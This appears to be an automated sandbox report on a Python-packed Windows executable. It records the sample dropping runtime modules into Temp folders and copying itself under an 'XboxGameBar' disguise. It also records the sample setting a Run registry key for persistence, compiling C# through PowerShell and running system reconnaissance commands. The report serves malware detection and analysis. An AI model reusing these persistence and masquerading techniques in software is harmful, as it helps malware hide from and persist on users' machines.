                      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pip-req-build-7t032bmh\src\rust\target\release\deps\cryptography_rust.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD86F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6F17000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: X509_SIGPKCS8_encrypt_excrypto\pkcs12\p12_p8e.cPKCS8_set0_pbe_excompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specific.dllCPUINFO: crypto\initthread.cOPENSSL_ia32cap source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: RuntimeusererVers.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: RuntimeusererVers.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: RuntimeusererVers.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: RuntimeusererVers.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: RuntimeusererVers.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.cmdline"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.cmdline"
                      Source: libcrypto-1_1.dll.0.drStatic PE information: section name: .00cfg
                      Source: libssl-1_1.dll.0.drStatic PE information: section name: .00cfg
                      Source: python311.dll.0.drStatic PE information: section name: PyRuntim
                      Source: vcruntime140.dll.0.drStatic PE information: section name: _RDATA
                      Source: libcrypto-1_1.dll.37.drStatic PE information: section name: .00cfg
                      Source: libssl-1_1.dll.37.drStatic PE information: section name: .00cfg
                      Source: python311.dll.37.drStatic PE information: section name: PyRuntim
                      Source: vcruntime140.dll.37.drStatic PE information: section name: _RDATA
                      Source: libcrypto-1_1.dll.55.drStatic PE information: section name: .00cfg
                      Source: libssl-1_1.dll.55.drStatic PE information: section name: .00cfg
                      Source: python311.dll.55.drStatic PE information: section name: PyRuntim
                      Source: vcruntime140.dll.55.drStatic PE information: section name: _RDATA
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81DCA4196 push 2B41C88Bh; iretd 48_2_00007FF81DCA419B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 53_2_00007FF7BDB92045 push eax; iretd 53_2_00007FF7BDB9233D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 53_2_00007FF7BDB90B7D pushad ; retf 53_2_00007FF7BDB90D3D
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81DF04196 push 2B41C88Bh; iretd 58_2_00007FF81DF0419B
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81DF04CBC push 2B41C88Bh; iretd 58_2_00007FF81DF04CC1

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeProcess created: "C:\Users\user\Desktop\RuntimeusererVers.exe"
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeProcess created: "C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe"
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeProcess created: "C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_overlapped.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_ssl.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_sqlite3.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\python3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_uuid.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_lzma.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\pyexpat.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\bcrypt\_bcrypt.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\libssl-1_1.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\libcrypto-1_1.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\aiohttp\_helpers.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\aiohttp\_websocket.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_bz2.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\bcrypt\_bcrypt.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\zstandard\_cffi.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_queue.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\aiohttp\_websocket.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_ctypes.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\frozenlist\_frozenlist.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_decimal.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\select.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_socket.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\pyexpat.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\unicodedata.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\aiohttp\_http_parser.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\zstandard\_cffi.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\libffi-8.dllJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\pyexpat.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\yarl\_quoting_c.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_cffi_backend.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\aiohttp\_http_writer.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\multidict\_multidict.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\aiohttp\_http_parser.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\zstandard\_cffi.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\python311.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_hashlib.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\charset_normalizer\md__mypyc.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\frozenlist\_frozenlist.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\aiohttp\_helpers.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\python311.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_hashlib.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_overlapped.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\libffi-8.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\libssl-1_1.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_ctypes.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_queue.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_lzma.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\vcruntime140.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_socket.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_sqlite3.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_uuid.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_lzma.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_asyncio.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_cffi_backend.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\pycares\_cares.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_overlapped.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\charset_normalizer\md__mypyc.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\zstandard\backend_c.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_sqlite3.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\aiohttp\_http_parser.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\aiohttp\_http_writer.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\zstandard\backend_c.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\python311.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\sqlite3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_ssl.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\libssl-1_1.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_brotli.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\charset_normalizer\md__mypyc.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\yarl\_quoting_c.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_socket.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\libcrypto-1_1.dllJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\aiohttp\_http_writer.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\charset_normalizer\md.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\unicodedata.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_bz2.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_asyncio.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_bz2.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_brotli.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\multidict\_multidict.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\sqlite3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_decimal.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_hashlib.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_brotli.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_asyncio.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\charset_normalizer\md.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\select.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\libffi-8.dllJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\libcrypto-1_1.dllJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_multiprocessing.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\frozenlist\_frozenlist.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_ssl.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\vcruntime140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_uuid.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\multidict\_multidict.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\bcrypt\_bcrypt.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\vcruntime140.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\unicodedata.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_multiprocessing.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\charset_normalizer\md.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\yarl\_quoting_c.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\sqlite3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\aiohttp\_websocket.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\zstandard\backend_c.pydJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_multiprocessing.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\aiohttp\_helpers.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\pycares\_cares.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_decimal.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_ctypes.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\python3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_queue.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\select.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\pycares\_cares.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_cffi_backend.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\python3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XboxGameBarJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XboxGameBarJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
